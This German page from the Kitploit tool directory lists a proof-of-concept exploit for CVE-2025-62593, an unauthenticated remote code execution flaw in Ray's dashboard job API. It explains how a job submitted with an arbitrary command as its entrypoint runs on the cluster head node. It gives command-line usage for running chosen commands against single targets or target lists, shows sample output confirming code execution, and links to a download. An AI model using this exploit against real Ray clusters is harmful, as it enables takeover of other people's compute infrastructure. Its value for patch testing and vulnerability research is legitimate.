Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-62593-PoC — PoC für CVE-2025-62593: nicht authentifizierte RCE in Ray (CISA KEV). Nur mit der Python-Standardbibliothek. | Kitploit
Tools/GitHubGitHub/boreas37/cve-2025-62593-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsKI-Sicherheit
GitHubboreas37/cve-2025-62593-poc

CVE-2025-62593-PoC

PoC für CVE-2025-62593: nicht authentifizierte RCE in Ray (CISA KEV). Nur mit der Python-Standardbibliothek.

Repository anzeigen
215vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-62593 — Ray Remote Code Execution (unauthenticated)

Proof-of-Concept für CVE-2025-62593, eine nicht authentifizierte Remote-Codeausführung Schwachstelle in der Ray Distributed-AI-Compute-Engine, die über browserbasierte DNS-Rebinding-Angriffe ausgenutzt wird. Sie wurde in den CISA Known Exploited Vulnerabilities (KEV) Catalog aufgenommen und wird aktiv ausgenutzt.

Die Ursache ist eine langjährige Designentscheidung des Ray-Teams, keine Authentifizierung für kritische HTTP-Endpunkte wie /api/jobs und /api/job_agent/jobs zu verwenden. Dadurch kann ein nicht authentifizierter Remote-Angreifer einen Ray-Job einreichen, dessen Entrypoint ein beliebiger Befehl ist, der dann auf dem Cluster-Head-Knoten ausgeführt wird — vollständige Remote-Codeausführung.

Dieser PoC spricht die Ray-Dashboard-HTTP-API direkt an (kein Browser/DNS-Rebinding nötig, um den zugrunde liegenden Fehler zu demonstrieren) und ruft die Befehlsausgabe aus den Job-Logs ab.

Auswirkungen

  • CVSS: Kritisch (9.8)
  • Betroffen: Ray < 2.52.0 (Patch für dieses Advisory veröffentlicht)
  • CISA KEV: Ja — aktive Ausnutzung, Frist für Behebung durchgesetzt
  • Setzt die ~200k+ öffentlich erreichbaren Ray-AI-Cluster einer RCE vor der Authentifizierung aus

Was es tut

  1. POST /api/jobs/ mit einem entrypoint, der Ihren Befehl ausführt und dessen stdout/stderr in eine temporäre Datei umleitet und die Datei dann ausgibt.
  2. Pollt GET /api/jobs/, bis der Job einen Endstatus erreicht.
  3. Liest GET /api/jobs/<submission_id>/logs und gibt die Befehlsausgabe aus.

Verwendung

# Einzelnes Ziel
python3 ray_rce_poc.py --target http://HOST:8265

# Benutzerdefinierter Befehl
python3 ray_rce_poc.py --target http://HOST:8265 --command "id; uname -a"

# Mehrere Ziele aus einer Datei (eine pro Zeile, '#' = Kommentar)
python3 ray_rce_poc.py --targets targets.txt --command id

# JSON-Zusammenfassung schreiben
python3 ray_rce_poc.py --target http://HOST:8265 --output out.json

# Hilfe
python3 ray_rce_poc.py --help

Benötigt nur Python-3-Standardbibliothek — keine Drittanbieter-Abhängigkeiten.

Beispiel (gegen ein lokales Docker-Labor verifiziert)

$ python3 ray_rce_poc.py --target http://localhost:8265 --command "id; hostname"
== http://localhost:8265
Running entrypoint for job raysubmit_XXX: python -c "import os,os.path; ..."
uid=1000(ray) gid=100(users) groups=100(users),27(sudo)
05cdb1bea437
=> PASS (RCE confirmed, status: SUCCEEDED, exit code: 0)

Referenzen

  • CISA KEV catalog
  • GitHub Security Advisory GHSA-q279-jhrf-cc6v

Haftungsausschluss

Nur für Sicherheitsforschung und autorisierte Tests. Verwenden Sie dies nur gegen Systeme, die Ihnen gehören oder für die Sie ausdrücklich die Erlaubnis zum Testen haben. Der Autor übernimmt keine Verantwortung für Missbrauch.

Tool herunterladen